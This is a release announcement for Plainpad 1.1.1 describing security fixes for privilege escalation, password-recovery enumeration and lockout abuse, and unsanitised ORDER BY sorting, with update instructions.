Plainpad 1.1.1 Released — Important Security Fixes
Plainpad 1.1.1 is now available. This is a security-focused patch release that addresses several issues we strongly recommend every administrator apply as soon as possible. There are no breaking changes — it’s a drop-in update over 1.1.0.
What’s Fixed
Privilege-escalation vulnerability (#138)
The most important fix in this release closes a privilege-escalation hole that allowed any authenticated user to grant themselves administrator rights. If you’re running a multi-user instance — especially one open to registration — you should update immediately and audit your user list for unexpected admin accounts.
Hardened password recovery
The password recovery endpoint has been reworked to prevent two related abuses:
- Account enumeration — responses no longer leak whether an email address is registered, so attackers can’t probe the endpoint to build a list of valid users.
- Unauthenticated account lockout — the endpoint can no longer be used by an anonymous attacker to repeatedly trigger lockouts on a victim’s account.
Safer sorting on list endpoints
The user and note list endpoints now whitelist both the sortable columns and the sort direction. Previously, unsanitised ORDER BY input could be passed straight through to the database. The new whitelist approach removes that class of issue entirely.
User modal validation
The user modal in the admin UI now applies form validation rules, catching invalid input on the client before it reaches the server and giving administrators clearer feedback when something is wrong.
How to Update
Grab the new release from GitHub:
Then follow the standard Updating guide to apply it to your instance. If you’re running Plainpad with Docker, pull the latest image — see the Docker documentation for details.
Because of the privilege-escalation issue, we recommend updating at the earliest opportunity, even if your instance is only used internally.
Reporting Security Issues
If you believe you’ve found a security issue in Plainpad, please report it responsibly via the channels listed on the Support page rather than opening a public issue. We appreciate every report — they make the project safer for everyone.
Thanks to everyone who reported, reviewed, and helped fix the issues in this release.
Need Professional Help?
Get custom development, managed hosting, data migration, and technical support — directly from the creators of Plainpad.
Explore Premium